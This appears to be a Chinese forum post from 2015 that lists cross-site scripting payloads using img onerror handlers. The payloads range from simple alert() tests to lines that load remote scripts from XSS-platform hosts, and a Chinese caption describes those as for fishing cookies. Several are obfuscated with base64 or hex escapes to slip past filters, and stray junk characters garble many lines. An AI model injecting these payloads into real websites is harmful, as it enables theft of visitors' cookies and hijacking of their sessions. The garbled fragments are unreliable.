<img src='non-exist.jpg'onerror="alert('xss')">8 i+ |; l* Y( ]: ^, S
<img src=# onerror=alert(123)>
$ c5 v4 P6 z: u y. J8 ] c, \0 ]% M<img src=# onerror=alert(document.cookie)>1 t" b! M: T+ d( b
下面是利用平台钓cookie的
) K0 x! v2 P' N+ y; S <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
: X+ S5 ?( V: A0 m
( q$ r9 C0 ]* k! W, E
4 J, t6 f& O. a<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
& W$ n a7 K" p7 @$ @<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
( o/ V( K4 i' Y* r7 m8 i2 S“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
) B4 y; h5 X2 M; |# U<img src=1 onerror=jQuery.getScript("//xss.re/974")> 2 o8 {/ c. C* T8 _ x) e: K
<img src="#">! A' e: z3 F1 W# W) K' o) w0 y
<img src="#">
* p& Y& H1 p& N: q% D4 M<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
# D. v- b( d. d: }* e<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
: ?0 C( u3 [- _ E1 }0 Z2 [* g6 A<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>1 Y. h2 c; ]- j+ X
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
4 x& W( f/ |" l0 P/ j6 D& a; j<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>% h2 O& N+ H1 Z! w' a' I/ B
<img src=x width="0" height="0"></img>
* w& s" L9 y( p* ]( U<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>0 A/ P# M6 o* {3 W6 v
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
" q# [% ?9 P7 f+ k- @" q/ l- T |
发表于 2015-10-18 14:33:54
收藏
分享
支持
反对